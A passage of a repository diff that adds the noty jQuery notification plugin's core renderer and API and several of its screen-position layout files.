this.$closeButton = this.$bar.find('.noty_close');
|
84 |
+
this.$buttons = this.$bar.find('.noty_buttons');
|
85 |
+
|
86 |
+
$.noty.store[this.options.id] = this; // store noty for api
|
87 |
+
|
88 |
+
}, // end _build
|
89 |
+
|
90 |
+
show:function () {
|
91 |
+
|
92 |
+
var self = this;
|
93 |
+
|
94 |
+
$(self.options.layout.container.selector).append(self.$bar);
|
95 |
+
|
96 |
+
self.options.theme.style.apply(self);
|
97 |
+
|
98 |
+
($.type(self.options.layout.css) === 'function') ? this.options.layout.css.apply(self.$bar) : self.$bar.css(this.options.layout.css || {});
|
99 |
+
|
100 |
+
self.$bar.addClass(self.options.layout.addClass);
|
101 |
+
|
102 |
+
self.options.layout.container.style.apply($(self.options.layout.container.selector));
|
103 |
+
|
104 |
+
self.options.theme.callback.onShow.apply(this);
|
105 |
+
|
106 |
+
if ($.inArray('click', self.options.closeWith) > -1)
|
107 |
+
self.$bar.css('cursor', 'pointer').one('click', function () {
|
108 |
+
self.close();
|
109 |
+
});
|
110 |
+
|
111 |
+
if ($.inArray('hover', self.options.closeWith) > -1)
|
112 |
+
self.$bar.one('mouseenter', function () {
|
113 |
+
self.close();
|
114 |
+
});
|
115 |
+
|
116 |
+
if ($.inArray('button', self.options.closeWith) > -1)
|
117 |
+
self.$closeButton.one('click', function () {
|
118 |
+
self.close();
|
119 |
+
});
|
120 |
+
|
121 |
+
if ($.inArray('button', self.options.closeWith) == -1)
|
122 |
+
self.$closeButton.remove();
|
123 |
+
|
124 |
+
if (self.options.callback.onShow)
|
125 |
+
self.options.callback.onShow.apply(self);
|
126 |
+
|
127 |
+
self.$bar.animate(
|
128 |
+
self.options.animation.open,
|
129 |
+
self.options.animation.speed,
|
130 |
+
self.options.animation.easing,
|
131 |
+
function () {
|
132 |
+
if (self.options.callback.afterShow) self.options.callback.afterShow.apply(self);
|
133 |
+
self.shown = true;
|
134 |
+
});
|
135 |
+
|
136 |
+
// If noty is have a timeout option
|
137 |
+
if (self.options.timeout)
|
138 |
+
self.$bar.delay(self.options.timeout).promise().done(function () {
|
139 |
+
self.close();
|
140 |
+
});
|
141 |
+
|
142 |
+
return this;
|
143 |
+
|
144 |
+
}, // end show
|
145 |
+
|
146 |
+
close:function () {
|
147 |
+
|
148 |
+
if (this.closed) return;
|
149 |
+
|
150 |
+
var self = this;
|
151 |
+
|
152 |
+
if (!this.shown) { // If we are still waiting in the queue just delete from queue
|
153 |
+
var queue = [];
|
154 |
+
$.each($.noty.queue, function (i, n) {
|
155 |
+
if (n.options.id != self.options.id) {
|
156 |
+
queue.push(n);
|
157 |
+
}
|
158 |
+
});
|
159 |
+
$.noty.queue = queue;
|
160 |
+
return;
|
161 |
+
}
|
162 |
+
|
163 |
+
self.$bar.addClass('i-am-closing-now');
|
164 |
+
|
165 |
+
if (self.options.callback.onClose) {
|
166 |
+
self.options.callback.onClose.apply(self);
|
167 |
+
}
|
168 |
+
|
169 |
+
self.$bar.clearQueue().stop().animate(
|
170 |
+
self.options.animation.close,
|
171 |
+
self.options.animation.speed,
|
172 |
+
self.options.animation.easing,
|
173 |
+
function () {
|
174 |
+
if (self.options.callback.afterClose) self.options.callback.afterClose.apply(self);
|
175 |
+
})
|
176 |
+
.promise().done(function () {
|
177 |
+
|
178 |
+
// Modal Cleaning
|
179 |
+
if (self.options.modal) {
|
180 |
+
$.notyRenderer.setModalCount(-1);
|
181 |
+
if ($.notyRenderer.getModalCount() == 0) $('.noty_modal').fadeOut('fast', function () {
|
182 |
+
$(this).remove();
|
183 |
+
});
|
184 |
+
}
|
185 |
+
|
186 |
+
// Layout Cleaning
|
187 |
+
$.notyRenderer.setLayoutCountFor(self, -1);
|
188 |
+
if ($.notyRenderer.getLayoutCountFor(self) == 0) $(self.options.layout.container.selector).remove();
|
189 |
+
|
190 |
+
self.$bar.remove();
|
191 |
+
self.$bar = null;
|
192 |
+
self.closed = true;
|
193 |
+
|
194 |
+
delete $.noty.store[self.options.id]; // deleting noty from store
|
195 |
+
|
196 |
+
self.options.theme.callback.onClose.apply(self);
|
197 |
+
|
198 |
+
if (!self.options.dismissQueue) {
|
199 |
+
// Queue render
|
200 |
+
$.noty.ontap = true;
|
201 |
+
|
202 |
+
$.notyRenderer.render();
|
203 |
+
}
|
204 |
+
|
205 |
+
});
|
206 |
+
|
207 |
+
}, // end close
|
208 |
+
|
209 |
+
setText:function (text) {
|
210 |
+
if (!this.closed) {
|
211 |
+
this.options.text = text;
|
212 |
+
this.$bar.find('.noty_text').html(text);
|
213 |
+
}
|
214 |
+
return this;
|
215 |
+
},
|
216 |
+
|
217 |
+
setType:function (type) {
|
218 |
+
if (!this.closed) {
|
219 |
+
this.options.type = type;
|
220 |
+
this.options.theme.style.apply(this);
|
221 |
+
this.options.theme.callback.onShow.apply(this);
|
222 |
+
}
|
223 |
+
return this;
|
224 |
+
},
|
225 |
+
|
226 |
+
setTimeout:function (time) {
|
227 |
+
if (!this.closed) {
|
228 |
+
var self = this;
|
229 |
+
this.options.timeout = time;
|
230 |
+
self.$bar.delay(self.options.timeout).promise().done(function () {
|
231 |
+
self.close();
|
232 |
+
});
|
233 |
+
}
|
234 |
+
return this;
|
235 |
+
},
|
236 |
+
|
237 |
+
closed:false,
|
238 |
+
shown:false
|
239 |
+
|
240 |
+
}; // end NotyObject
|
241 |
+
|
242 |
+
$.notyRenderer = {};
|
243 |
+
|
244 |
+
$.notyRenderer.init = function (options) {
|
245 |
+
|
246 |
+
// Renderer creates a new noty
|
247 |
+
var notification = Object.create(NotyObject).init(options);
|
248 |
+
|
249 |
+
(notification.options.force) ? $.noty.queue.unshift(notification) : $.noty.queue.push(notification);
|
250 |
+
|
251 |
+
$.notyRenderer.render();
|
252 |
+
|
253 |
+
return ($.noty.returns == 'object') ? notification : notification.options.id;
|
254 |
+
};
|
255 |
+
|
256 |
+
$.notyRenderer.render = function () {
|
257 |
+
|
258 |
+
var instance = $.noty.queue[0];
|
259 |
+
|
260 |
+
if ($.type(instance) === 'object') {
|
261 |
+
if (instance.options.dismissQueue) {
|
262 |
+
$.notyRenderer.show($.noty.queue.shift());
|
263 |
+
} else {
|
264 |
+
if ($.noty.ontap) {
|
265 |
+
$.notyRenderer.show($.noty.queue.shift());
|
266 |
+
$.noty.ontap = false;
|
267 |
+
}
|
268 |
+
}
|
269 |
+
} else {
|
270 |
+
$.noty.ontap = true; // Queue is over
|
271 |
+
}
|
272 |
+
|
273 |
+
};
|
274 |
+
|
275 |
+
$.notyRenderer.show = function (notification) {
|
276 |
+
|
277 |
+
if (notification.options.modal) {
|
278 |
+
$.notyRenderer.createModalFor(notification);
|
279 |
+
$.notyRenderer.setModalCount(+1);
|
280 |
+
}
|
281 |
+
|
282 |
+
// Where is the container?
|
283 |
+
if ($(notification.options.layout.container.selector).length == 0) {
|
284 |
+
if (notification.options.custom) {
|
285 |
+
notification.options.custom.append($(notification.options.layout.container.object).addClass('i-am-new'));
|
286 |
+
} else {
|
287 |
+
$('body').append($(notification.options.layout.container.object).addClass('i-am-new'));
|
288 |
+
}
|
289 |
+
} else {
|
290 |
+
$(notification.options.layout.container.selector).removeClass('i-am-new');
|
291 |
+
}
|
292 |
+
|
293 |
+
$.notyRenderer.setLayoutCountFor(notification, +1);
|
294 |
+
|
295 |
+
notification.show();
|
296 |
+
};
|
297 |
+
|
298 |
+
$.notyRenderer.createModalFor = function (notification) {
|
299 |
+
if ($('.noty_modal').length == 0)
|
300 |
+
$('<div/>').addClass('noty_modal').data('noty_modal_count', 0).css(notification.options.theme.modal.css).prependTo($('body')).fadeIn('fast');
|
301 |
+
};
|
302 |
+
|
303 |
+
$.notyRenderer.getLayoutCountFor = function (notification) {
|
304 |
+
return $(notification.options.layout.container.selector).data('noty_layout_count') || 0;
|
305 |
+
};
|
306 |
+
|
307 |
+
$.notyRenderer.setLayoutCountFor = function (notification, arg) {
|
308 |
+
return $(notification.options.layout.container.selector).data('noty_layout_count', $.notyRenderer.getLayoutCountFor(notification) + arg);
|
309 |
+
};
|
310 |
+
|
311 |
+
$.notyRenderer.getModalCount = function () {
|
312 |
+
return $('.noty_modal').data('noty_modal_count') || 0;
|
313 |
+
};
|
314 |
+
|
315 |
+
$.notyRenderer.setModalCount = function (arg) {
|
316 |
+
return $('.noty_modal').data('noty_modal_count', $.notyRenderer.getModalCount() + arg);
|
317 |
+
};
|
318 |
+
|
319 |
+
// This is for custom container
|
320 |
+
$.fn.noty = function (options) {
|
321 |
+
options.custom = $(this);
|
322 |
+
return $.notyRenderer.init(options);
|
323 |
+
};
|
324 |
+
|
325 |
+
$.noty = {};
|
326 |
+
$.noty.queue = [];
|
327 |
+
$.noty.ontap = true;
|
328 |
+
$.noty.layouts = {};
|
329 |
+
$.noty.themes = {};
|
330 |
+
$.noty.returns = 'object';
|
331 |
+
$.noty.store = {};
|
332 |
+
|
333 |
+
$.noty.get = function (id) {
|
334 |
+
return $.noty.store.hasOwnProperty(id) ? $.noty.store[id] : false;
|
335 |
+
};
|
336 |
+
|
337 |
+
$.noty.close = function (id) {
|
338 |
+
return $.noty.get(id) ? $.noty.get(id).close() : false;
|
339 |
+
};
|
340 |
+
|
341 |
+
$.noty.setText = function (id, text) {
|
342 |
+
return $.noty.get(id) ? $.noty.get(id).setText(text) : false;
|
343 |
+
};
|
344 |
+
|
345 |
+
$.noty.setType = function (id, type) {
|
346 |
+
return $.noty.get(id) ? $.noty.get(id).setType(type) : false;
|
347 |
+
};
|
348 |
+
|
349 |
+
$.noty.clearQueue = function () {
|
350 |
+
$.noty.queue = [];
|
351 |
+
};
|
352 |
+
|
353 |
+
$.noty.closeAll = function () {
|
354 |
+
$.noty.clearQueue();
|
355 |
+
$.each($.noty.store, function (id, noty) {
|
356 |
+
noty.close();
|
357 |
+
});
|
358 |
+
};
|
359 |
+
|
360 |
+
var windowAlert = window.alert;
|
361 |
+
|
362 |
+
$.noty.consumeAlert = function (options) {
|
363 |
+
window.alert = function (text) {
|
364 |
+
if (options)
|
365 |
+
options.text = text;
|
366 |
+
else
|
367 |
+
options = {text:text};
|
368 |
+
|
369 |
+
$.notyRenderer.init(options);
|
370 |
+
};
|
371 |
+
};
|
372 |
+
|
373 |
+
$.noty.stopConsumeAlert = function () {
|
374 |
+
window.alert = windowAlert;
|
375 |
+
};
|
376 |
+
|
377 |
+
$.noty.defaults = {
|
378 |
+
layout:'top',
|
379 |
+
theme:'defaultTheme',
|
380 |
+
type:'alert',
|
381 |
+
text:'',
|
382 |
+
dismissQueue:true,
|
383 |
+
template:'<div class="noty_message"><span class="noty_text"></span><div class="noty_close"></div></div>',
|
384 |
+
animation:{
|
385 |
+
open:{height:'toggle'},
|
386 |
+
close:{height:'toggle'},
|
387 |
+
easing:'swing',
|
388 |
+
speed:500
|
389 |
+
},
|
390 |
+
timeout:false,
|
391 |
+
force:false,
|
392 |
+
modal:false,
|
393 |
+
closeWith:['click'],
|
394 |
+
callback:{
|
395 |
+
onShow:function () {
|
396 |
+
},
|
397 |
+
afterShow:function () {
|
398 |
+
},
|
399 |
+
onClose:function () {
|
400 |
+
},
|
401 |
+
afterClose:function () {
|
402 |
+
}
|
403 |
+
},
|
404 |
+
buttons:false
|
405 |
+
};
|
406 |
+
|
407 |
+
$(window).resize(function () {
|
408 |
+
$.each($.noty.layouts, function (index, layout) {
|
409 |
+
layout.container.style.apply($(layout.container.selector));
|
410 |
+
});
|
411 |
+
});
|
412 |
+
|
413 |
+
})(jQuery);
|
414 |
+
|
415 |
+
// Helpers
|
416 |
+
function noty(options) {
|
417 |
+
|
418 |
+
// This is for BC - Will be deleted on v2.2.0
|
419 |
+
var using_old = 0
|
420 |
+
, old_to_new = {
|
421 |
+
'animateOpen':'animation.open',
|
422 |
+
'animateClose':'animation.close',
|
423 |
+
'easing':'animation.easing',
|
424 |
+
'speed':'animation.speed',
|
425 |
+
'onShow':'callback.onShow',
|
426 |
+
'onShown':'callback.afterShow',
|
427 |
+
'onClose':'callback.onClose',
|
428 |
+
'onClosed':'callback.afterClose'
|
429 |
+
};
|
430 |
+
|
431 |
+
jQuery.each(options, function (key, value) {
|
432 |
+
if (old_to_new[key]) {
|
433 |
+
using_old++;
|
434 |
+
var _new = old_to_new[key].split('.');
|
435 |
+
|
436 |
+
if (!options[_new[0]]) options[_new[0]] = {};
|
437 |
+
|
438 |
+
options[_new[0]][_new[1]] = (value) ? value : function () {
|
439 |
+
};
|
440 |
+
delete options[key];
|
441 |
+
}
|
442 |
+
});
|
443 |
+
|
444 |
+
if (!options.closeWith) {
|
445 |
+
options.closeWith = jQuery.noty.defaults.closeWith;
|
446 |
+
}
|
447 |
+
|
448 |
+
if (options.hasOwnProperty('closeButton')) {
|
449 |
+
using_old++;
|
450 |
+
if (options.closeButton) options.closeWith.push('button');
|
451 |
+
delete options.closeButton;
|
452 |
+
}
|
453 |
+
|
454 |
+
if (options.hasOwnProperty('closeOnSelfClick')) {
|
455 |
+
using_old++;
|
456 |
+
if (options.closeOnSelfClick) options.closeWith.push('click');
|
457 |
+
delete options.closeOnSelfClick;
|
458 |
+
}
|
459 |
+
|
460 |
+
if (options.hasOwnProperty('closeOnSelfOver')) {
|
461 |
+
using_old++;
|
462 |
+
if (options.closeOnSelfOver) options.closeWith.push('hover');
|
463 |
+
delete options.closeOnSelfOver;
|
464 |
+
}
|
465 |
+
|
466 |
+
if (options.hasOwnProperty('custom')) {
|
467 |
+
using_old++;
|
468 |
+
if (options.custom.container != 'null') options.custom = options.custom.container;
|
469 |
+
}
|
470 |
+
|
471 |
+
if (options.hasOwnProperty('cssPrefix')) {
|
472 |
+
using_old++;
|
473 |
+
delete options.cssPrefix;
|
474 |
+
}
|
475 |
+
|
476 |
+
if (options.theme == 'noty_theme_default') {
|
477 |
+
using_old++;
|
478 |
+
options.theme = 'defaultTheme';
|
479 |
+
}
|
480 |
+
|
481 |
+
if (!options.hasOwnProperty('dismissQueue')) {
|
482 |
+
if (options.layout == 'topLeft'
|
483 |
+
|| options.layout == 'topRight'
|
484 |
+
|| options.layout == 'bottomLeft'
|
485 |
+
|| options.layout == 'bottomRight') {
|
486 |
+
options.dismissQueue = true;
|
487 |
+
} else {
|
488 |
+
options.dismissQueue = false;
|
489 |
+
}
|
490 |
+
}
|
491 |
+
|
492 |
+
if (options.buttons) {
|
493 |
+
jQuery.each(options.buttons, function (i, button) {
|
494 |
+
if (button.click) {
|
495 |
+
using_old++;
|
496 |
+
button.onClick = button.click;
|
497 |
+
delete button.click;
|
498 |
+
}
|
499 |
+
if (button.type) {
|
500 |
+
using_old++;
|
501 |
+
button.addClass = button.type;
|
502 |
+
delete button.type;
|
503 |
+
}
|
504 |
+
});
|
505 |
+
}
|
506 |
+
|
507 |
+
if (using_old) {
|
508 |
+
if (typeof console !== "undefined" && console.warn) {
|
509 |
+
console.warn('You are using noty v2 with v1.x.x options. @deprecated until v2.2.0 - Please update your options.');
|
510 |
+
}
|
511 |
+
}
|
512 |
+
|
513 |
+
// console.log(options);
|
514 |
+
// End of the BC
|
515 |
+
|
516 |
+
return jQuery.notyRenderer.init(options);
|
517 |
+
}
|
settings/types/js/noty/layouts/bottom.js
ADDED
@@ -0,0 +1,34 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.bottom = {
|
4 |
+
name: 'bottom',
|
5 |
+
options: {},
|
6 |
+
container: {
|
7 |
+
object: '<ul id="noty_bottom_layout_container" />',
|
8 |
+
selector: 'ul#noty_bottom_layout_container',
|
9 |
+
style: function() {
|
10 |
+
$(this).css({
|
11 |
+
bottom: 0,
|
12 |
+
left: '5%',
|
13 |
+
position: 'fixed',
|
14 |
+
width: '90%',
|
15 |
+
height: 'auto',
|
16 |
+
margin: 0,
|
17 |
+
padding: 0,
|
18 |
+
listStyleType: 'none',
|
19 |
+
zIndex: 9999999
|
20 |
+
});
|
21 |
+
}
|
22 |
+
},
|
23 |
+
parent: {
|
24 |
+
object: '<li />',
|
25 |
+
selector: 'li',
|
26 |
+
css: {}
|
27 |
+
},
|
28 |
+
css: {
|
29 |
+
display: 'none'
|
30 |
+
},
|
31 |
+
addClass: ''
|
32 |
+
};
|
33 |
+
|
34 |
+
})(jQuery);
|
settings/types/js/noty/layouts/bottomCenter.js
ADDED
@@ -0,0 +1,41 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.bottomCenter = {
|
4 |
+
name: 'bottomCenter',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_bottomCenter_layout_container" />',
|
10 |
+
selector: 'ul#noty_bottomCenter_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
bottom: 20,
|
14 |
+
left: 0,
|
15 |
+
position: 'fixed',
|
16 |
+
width: '310px',
|
17 |
+
height: 'auto',
|
18 |
+
margin: 0,
|
19 |
+
padding: 0,
|
20 |
+
listStyleType: 'none',
|
21 |
+
zIndex: 10000000
|
22 |
+
});
|
23 |
+
|
24 |
+
$(this).css({
|
25 |
+
left: ($(window).width() - $(this).outerWidth()) / 2 + 'px'
|
26 |
+
});
|
27 |
+
}
|
28 |
+
},
|
29 |
+
parent: {
|
30 |
+
object: '<li />',
|
31 |
+
selector: 'li',
|
32 |
+
css: {}
|
33 |
+
},
|
34 |
+
css: {
|
35 |
+
display: 'none',
|
36 |
+
width: '310px'
|
37 |
+
},
|
38 |
+
addClass: ''
|
39 |
+
};
|
40 |
+
|
41 |
+
})(jQuery);
|
settings/types/js/noty/layouts/bottomLeft.js
ADDED
@@ -0,0 +1,43 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.bottomLeft = {
|
4 |
+
name: 'bottomLeft',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_bottomLeft_layout_container" />',
|
10 |
+
selector: 'ul#noty_bottomLeft_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
bottom: 20,
|
14 |
+
left: 20,
|
15 |
+
position: 'fixed',
|
16 |
+
width: '310px',
|
17 |
+
height: 'auto',
|
18 |
+
margin: 0,
|
19 |
+
padding: 0,
|
20 |
+
listStyleType: 'none',
|
21 |
+
zIndex: 10000000
|
22 |
+
});
|
23 |
+
|
24 |
+
if (window.innerWidth < 600) {
|
25 |
+
$(this).css({
|
26 |
+
left: 5
|
27 |
+
});
|
28 |
+
}
|
29 |
+
}
|
30 |
+
},
|
31 |
+
parent: {
|
32 |
+
object: '<li />',
|
33 |
+
selector: 'li',
|
34 |
+
css: {}
|
35 |
+
},
|
36 |
+
css: {
|
37 |
+
display: 'none',
|
38 |
+
width: '310px'
|
39 |
+
},
|
40 |
+
addClass: ''
|
41 |
+
};
|
42 |
+
|
43 |
+
})(jQuery);
|
settings/types/js/noty/layouts/bottomRight.js
ADDED
@@ -0,0 +1,43 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.bottomRight = {
|
4 |
+
name: 'bottomRight',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_bottomRight_layout_container" />',
|
10 |
+
selector: 'ul#noty_bottomRight_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
bottom: 20,
|
14 |
+
right: 20,
|
15 |
+
position: 'fixed',
|
16 |
+
width: '310px',
|
17 |
+
height: 'auto',
|
18 |
+
margin: 0,
|
19 |
+
padding: 0,
|
20 |
+
listStyleType: 'none',
|
21 |
+
zIndex: 10000000
|
22 |
+
});
|
23 |
+
|
24 |
+
if (window.innerWidth < 600) {
|
25 |
+
$(this).css({
|
26 |
+
right: 5
|
27 |
+
});
|
28 |
+
}
|
29 |
+
}
|
30 |
+
},
|
31 |
+
parent: {
|
32 |
+
object: '<li />',
|
33 |
+
selector: 'li',
|
34 |
+
css: {}
|
35 |
+
},
|
36 |
+
css: {
|
37 |
+
display: 'none',
|
38 |
+
width: '310px'
|
39 |
+
},
|
40 |
+
addClass: ''
|
41 |
+
};
|
42 |
+
|
43 |
+
})(jQuery);
|
settings/types/js/noty/layouts/center.js
ADDED
@@ -0,0 +1,56 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.center = {
|
4 |
+
name: 'center',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_center_layout_container" />',
|
10 |
+
selector: 'ul#noty_center_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
position: 'fixed',
|
14 |
+
width: '310px',
|
15 |
+
height: 'auto',
|
16 |
+
margin: 0,
|
17 |
+
padding: 0,
|
18 |
+
listStyleType: 'none',
|
19 |
+
zIndex: 10000000
|
20 |
+
});
|
21 |
+
|
22 |
+
// getting hidden height
|
23 |
+
var dupe = $(this).clone().css({visibility:"hidden", display:"block", position:"absolute", top: 0, left: 0}).attr('id', 'dupe');
|
24 |
+
$("body").append(dupe);
|
25 |
+
dupe.find('.i-am-closing-now').remove();
|
26 |
+
dupe.find('li').css('display', 'block');
|
27 |
+
var actual_height = dupe.height();
|
28 |
+
dupe.remove();
|
29 |
+
|
30 |
+
if ($(this).hasClass('i-am-new')) {
|
31 |
+
$(this).css({
|
32 |
+
left: ($(window).width() - $(this).outerWidth()) / 2 + 'px',
|
33 |
+
top: ($(window).height() - actual_height) / 2 + 'px'
|
34 |
+
});
|
35 |
+
} else {
|
36 |
+
$(this).animate({
|
37 |
+
left: ($(window).width() - $(this).outerWidth()) / 2 + 'px',
|
38 |
+
top: ($(window).height() - actual_height) / 2 + 'px'
|
39 |
+
}, 500);
|
40 |
+
}
|
41 |
+
|
42 |
+
}
|
43 |
+
},
|
44 |
+
parent: {
|
45 |
+
object: '<li />',
|
46 |
+
selector: 'li',
|
47 |
+
css: {}
|
48 |
+
},
|
49 |
+
css: {
|
50 |
+
display: 'none',
|
51 |
+
width: '310px'
|
52 |
+
},
|
53 |
+
addClass: ''
|
54 |
+
};
|
55 |
+
|
56 |
+
})(jQuery);
|
settings/types/js/noty/layouts/centerLeft.js
ADDED
@@ -0,0 +1,61 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.centerLeft = {
|
4 |
+
name: 'centerLeft',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_centerLeft_layout_container" />',
|
10 |
+
selector: 'ul#noty_centerLeft_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
left: 20,
|
14 |
+
position: 'fixed',
|
15 |
+
width: '310px',
|
16 |
+
height: 'auto',
|
17 |
+
margin: 0,
|
18 |
+
padding: 0,
|
19 |
+
listStyleType: 'none',
|
20 |
+
zIndex: 10000000
|
21 |
+
});
|
22 |
+
|
23 |
+
// getting hidden height
|
24 |
+
var dupe = $(this).clone().css({visibility:"hidden", display:"block", position:"absolute", top: 0, left: 0}).attr('id', 'dupe');
|
25 |
+
$("body").append(dupe);
|
26 |
+
dupe.find('.i-am-closing-now').remove();
|
27 |
+
dupe.find('li').css('display', 'block');
|
28 |
+
var actual_height = dupe.height();
|
29 |
+
dupe.remove();
|
30 |
+
|
31 |
+
if ($(this).hasClass('i-am-new')) {
|
32 |
+
$(this).css({
|
33 |
+
top: ($(window).height() - actual_height) / 2 + 'px'
|
34 |
+
});
|
35 |
+
} else {
|
36 |
+
$(this).animate({
|
37 |
+
top: ($(window).height() - actual_height) / 2 + 'px'
|
38 |
+
}, 500);
|
39 |
+
}
|
40 |
+
|
41 |
+
if (window.innerWidth < 600) {
|
42 |
+
$(this).css({
|
43 |
+
left: 5
|
44 |
+
});
|
45 |
+
}
|
46 |
+
|
47 |
+
}
|
48 |
+
},
|
49 |
+
parent: {
|
50 |
+
object: '<li />',
|
51 |
+
selector: 'li',
|
52 |
+
css: {}
|
53 |
+
},
|
54 |
+
css: {
|
55 |
+
display: 'none',
|
56 |
+
width: '310px'
|
57 |
+
},
|
58 |
+
addClass: ''
|
59 |
+
};
|
60 |
+
|
61 |
+
})(jQuery);
|
settings/types/js/noty/layouts/centerRight.js
ADDED
@@ -0,0 +1,61 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.centerRight = {
|
4 |
+
name: 'centerRight',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_centerRight_layout_container" />',
|
10 |
+
selector: 'ul#noty_centerRight_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
right: 20,
|
14 |
+
position: 'fixed',
|
15 |
+
width: '310px',
|
16 |
+
height: 'auto',
|
17 |
+
margin: 0,
|
18 |
+
padding: 0,
|
19 |
+
listStyleType: 'none',
|
20 |
+
zIndex: 10000000
|
21 |
+
});
|
22 |
+
|
23 |
+
// getting hidden height
|
24 |
+
var dupe = $(this).clone().css({visibility:"hidden", display:"block", position:"absolute", top: 0, left: 0}).attr('id', 'dupe');
|
25 |
+
$("body").append(dupe);
|
26 |
+
dupe.find('.i-am-closing-now').remove();
|
27 |
+
dupe.find('li').css('display', 'block');
|
28 |
+
var actual_height = dupe.height();
|
29 |
+
dupe.remove();
|
30 |
+
|
31 |
+
if ($(this).hasClass('i-am-new')) {
|
32 |
+
$(this).css({
|
33 |
+
top: ($(window).height() - actual_height) / 2 + 'px'
|
34 |
+
});
|
35 |
+
} else {
|
36 |
+
$(this).animate({
|
37 |
+
top: ($(window).height() - actual_height) / 2 + 'px'
|
38 |
+
}, 500);
|
39 |
+
}
|
40 |
+
|
41 |
+
if (window.innerWidth < 600) {
|
42 |
+
$(this).css({
|
43 |
+
right: 5
|
44 |
+
});
|
45 |
+
}
|
46 |
+
|
47 |
+
}
|
48 |
+
},
|
49 |
+
parent: {
|
50 |
+
object: '<li />',
|
51 |
+
selector: 'li',
|
52 |
+
css: {}
|
53 |
+
},
|
54 |
+
css: {
|
55 |
+
display: 'none',
|
56 |
+
width: '310px'
|
57 |
+
},
|
58 |
+
addClass: ''
|
59 |
+
};
|
60 |
+
|
61 |
+
})(jQuery);
|
settings/types/js/noty/layouts/inline.js
ADDED
@@ -0,0 +1,31 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.inline = {
|
4 |
+
name: 'inline',
|
5 |
+
options: {},
|
6 |
+
container: {
|
7 |
+
object: '<ul id="noty_inline_layout_container" />',
|
8 |
+
selector: 'ul#noty_inline_layout_container',
|
9 |
+
style: function() {
|
10 |
+
$(this).css({
|
11 |
+
